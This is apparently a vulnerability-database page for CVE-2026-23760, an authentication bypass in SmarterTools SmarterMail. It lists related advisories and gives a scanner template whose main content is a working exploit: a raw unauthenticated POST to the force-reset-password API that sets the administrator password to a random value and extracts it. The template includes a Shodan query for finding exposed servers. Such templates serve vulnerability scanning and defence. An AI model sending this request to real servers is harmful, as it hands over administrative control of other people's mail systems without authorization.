| Reporter | Title | Published | Views | Family All 25 |
|---|---|---|---|---|
| Exploit for CVE-2026-23760 | 24 Jan 202612:30 | – | githubexploit | |
| CVE-2026-23760 | 22 Jan 202614:35 | – | attackerkb | |
| The vulnerability in the application programming interface of the SmarterTools SmarterMail mail server allows a malicious individual to update the administrator password to the default value and gain unauthorized access to the server. | 26 Jan 202600:00 | – | bdu_fstec | |
| CVE-2026-23760 | 22 Jan 202615:50 | – | circl | |
| SmarterTools SmarterMail Authentication Bypass Using an Alternate Path or Channel Vulnerability | 26 Jan 202600:00 | – | cisa_kev | |
| CISA Adds Five Known Exploited Vulnerabilities to Catalog | 26 Jan 202612:00 | – | cisa | |
| SmarterTools SmarterMail security vulnerability | 22 Jan 202600:00 | – | cnnvd | |
| CVE-2026-23760 | 22 Jan 202614:35 | – | cve | |
| CVE-2026-23760 SmarterTools SmarterMail < Build 9511 Authentication Bypass via Password Reset API | 22 Jan 202614:35 | – | cvelist | |
| EUVD-2026-4143 | 22 Jan 202614:35 | – | euvd |
id: CVE-2026-23760
info:
name: SmarterTools SmarterMail - Admin Password Reset
author: watchTowr,DhiyaneshDk
severity: critical
description: |
Detected a SmartMail admin password reset vulnerability by sending a POST request to the `/api/v1/auth/force-reset-password` endpoint, indicating that administrative password resets could potentially be triggered without proper authorization.
impact: |
Unauthenticated attackers can reset administrator passwords, leading to full administrative compromise of the system.
remediation: |
Upgrade to build 9511 or later.
reference:
- https://labs.watchtowr.com/attackers-with-decompilers-strike-again-smartertools-smartermail-wt-2026-0001-auth-bypass/
metadata:
verified: true
max-request: 1
shodan-query: html:"SmarterMail"
tags: cve,cve2026,intrusive,smartmail,admin,auth-bypass,vkev,kev
variables:
password: "{{rand_text_alphanumeric(12)}}"
http:
- raw:
- |
POST /api/v1/auth/force-reset-password HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
{"IsSysAdmin":"true",
"OldPassword":"watever",
"Username":"admin",
"NewPassword":"{{password}}",
"ConfirmPassword": "{{password}}"}
matchers-condition: and
matchers:
- type: word
part: body
words:
- '"success":true'
- 'debugInfo'
condition: and
- type: status
status:
- 200
extractors:
- type: dsl
dsl:
- '"New Password: " + password'
# digest: 4a0a00473045022075bc7a151ad673dcb658ce533235d67c2ed4910dd7c7b346be8535b6003e35f20221008669e4d8d1250dbbe0ffbb7b727bf10329de1163fc4c76ff4546665575bf303c:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation